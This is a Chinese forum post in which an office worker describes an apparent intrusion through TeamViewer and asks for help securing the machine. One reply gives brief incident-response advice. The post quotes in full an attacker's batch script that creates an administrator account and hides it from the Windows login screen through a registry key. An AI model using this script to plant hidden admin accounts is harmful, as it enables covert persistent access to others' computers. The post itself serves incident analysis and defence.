國慶長假前,為了以防萬一,我辦公室的電腦都是不關機的,并且開著TeamViewer,以備領導臨時打電話要什么資料
長假期間,公司全體放假,辦公室是上鎖了的
今天上班第一天,發現電腦被動過了,TeamViewer被關掉了,電腦處在注銷的界面,因為平時經常在公司內網用mstsc控制自己電腦,所以當時就覺得不對了
桌面上多了兩個東西,一個是Google Chrome的安裝檔案,是英文版的,另一個是叫“Hidden-User.bat”的批處理檔案,光看這個檔案名就很不祥
右鍵這兩個檔案,顯示創建時間都是10月2號的凌晨2點左右,那個時間公司不可能有人從內網遠程我的
用記事本打開這個批處理檔案,下面是代碼——
cd\
cls
REM "Mr_hosseinazer/hide user"
REM ------------------------------
@echo off
set /p user=Please Enter Desired Username:
set /p pass=Please Enter Desired Password:
net user /add %user% %pass%
net localgroup administrators /add %user%
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v %user% /t REG_DWORD /d 0
pause
我大致能看懂,一個叫“侯賽因 阿澤”的人寫的這個腳本,用處就是輸入用戶名和密碼后,創建一個該用戶名和密碼的系統管理員角色,下面那一段注冊表命令是干嘛用的我就不知道了
但是我進本地用戶和組,找不到任何新建的管理員角色,所以那人創建之后應該又刪掉了
另外程式里面也找不到谷歌瀏覽器,應該也是被卸載掉了
windows日志里面留下一大堆的操作記錄,從10月1號一直到10月3號都有,但是記錄條數太多了,我看不出頭緒
現在我害怕的就是這個入侵的人是否對公司資料庫動了手腳,因為我進資料庫是保存了密碼的
還有如何知道這個人對我電腦都進行了哪些改動,是否必須重裝了
最后是這個家伙的入侵路徑,一開始應該是用TeamViewer遠程我的,TeamViewer的日志記錄了10月1號一個陌生的電腦和我建立了連接,但是當天TeamViewer就被關閉了,所以那家伙之后是用其他辦法控制我電腦的
有沒有懂攻防的大神,幫我梳理下我都有哪些漏洞要補上的?
uj5u.com熱心網友回復:
uj5u.com熱心網友回復:
這個機器先斷網,去查服務器的日志,然后看是否有操作,本機的日志看看是否有記錄那個注冊表是應該是給你的管理員組和用戶組加賬號,可能是不顯示的,
查下那個注冊表的鍵值,
teamviewer看下登錄時間這個應該有LOG,
轉載請註明出處,本文鏈接:https://www.uj5u.com/caozuo/127936.html
標籤:安全技術/病毒
上一篇:2015最新優酷加密視頻真實地址
下一篇:改回被修改的IE或EDGE的主頁